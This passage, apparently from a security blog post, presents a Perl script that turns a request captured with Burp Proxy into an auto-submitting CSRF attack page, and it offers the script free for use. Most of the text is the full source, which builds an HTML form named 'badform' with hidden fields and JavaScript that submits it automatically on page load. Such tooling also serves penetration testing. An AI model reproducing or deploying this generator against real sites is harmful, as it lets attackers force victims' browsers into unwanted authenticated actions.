Therefore I developed a short Perl script which parses a request data into a CSRF request (almost the same).
What do you need in order to run the script:
1. Prel (obviously)
2. Burp Proxy - The attacker should intercept the request. and then copy all data to notepad. See example below:
My script pulls the data from the file "d:\csrf.txt", however it might be changed. The output is same with "html" extension.
See the source code of the script.
open(INF, '<d:\\csrf.txt') or die "error while opening the input file\n";
open(OUTF, '>d:\\csrf.html') or die "error while creatint the output file\n";
@arrin=<INF>;
@arrour=<OUTF>;
print "Script by Nir Valtman";
print "Enter the URL:";
$q=<STDIN>;
print OUTF "<html xmlns=\"http://www.w3.org/1999/xhtml\" >
<head>
<title>CSRF attack</title>
</head>
<body>
<form name=\"badform\" method=\"post\" action=\"$q\"> \n";
foreach $obj (@arrin)
{
chomp($obj);
@spltval=split('\t',$obj);
if ($spltval[0] eq "body")
{
print OUTF "<input type=\"hidden\" name=\"$spltval[1]\" value=\"$spltval[2]\" />\n";
}
}
print OUTF "<script type=\"text/javascript\">
document.badform.submit();
</script>
</body>
</html>";
print "Done!";
The script is free to use - just give me credits.